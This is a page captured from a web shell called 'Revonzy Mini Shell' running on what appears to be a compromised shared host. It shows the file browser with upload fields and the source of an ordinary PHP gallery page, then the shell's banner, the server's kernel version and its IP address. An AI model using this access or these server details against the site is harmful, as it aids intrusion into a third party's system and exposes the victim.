Revonzy Mini Shell

Revonzy Mini Shell

Şuanki Dizin: /home/wwwdreamtechnolo/public_html/dnyanjyot.in/
Dosya Yükle :
Şuanki Dosya : /home/wwwdreamtechnolo/public_html/dnyanjyot.in/gallery.php

<!--
	Powered By - Dream Technology, Solapur.
	Contact No : +91 9595775120
	Email ID - dream.technology@outlook.com
-->
<?php
	ob_start();
	require_once("lib/class/functions.php");
	$db = new functions();
	
	$current_page = "gallery";
?>
<DOCTYPE html>
<html>
<head>
	<meta charset="UTF-8">
	<title><?php echo $project_name; ?></title>
	<link rel="stylesheet" type="text/css" href="css/stylesheet.css"/>
</head>
<body>
	
	<?php
		require_once("lib/header.php");
	?>
		
	<div name="tab_container">
		<div class="main_container" style="min-height:710px;">
		
		<div class="page_highlighter">Gallery</div>
			
        <?php
			require_once("highlights.php");
		?>
				
			<div class="data_container">
				<?php
			$images_data	=	array();
			
			$images_data	=	$db->get_all_gallery_images();
			
			if(!empty($images_data))
			{
				$count = 0;
				foreach($images_data as $data)
				{
					$current_img_id	=	$images_data[$count]['id'];
					$slide_image	=	$images_data[$count]['img_name'];
		?>
			<div class="admin_slide_imgs_contner">
				<img src="/gallery-images/<?php echo $slide_image; ?>" class="admin_slide_imgs" />
			</div>
		<?php
					$count++;
				}
			}
			else
			{
		?>
					<div class="no_img">
						No images added to Image Gallery
						
						<br /><br />
						
						<center> <img data-u="image" src="images/comingsoon.png" height="500" style="padding:5px; border:0px solid #DFDFDF;" /></center>
					</div>
		<?php
			}
		?>
				
			</div>
			
		</div>
	</div>
			
	<?php
		require_once("lib/footer.php");
	?>
</body>
</html>

EliteHackz.ORG
Revonzy Mini Shell
root@revonzy.com

Linux 65-254-81-4.cprapid.com 5.14.0-284.11.1.el9_2.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 9 05:49:00 EDT 2023 x86_64
Apache
65.254.81.4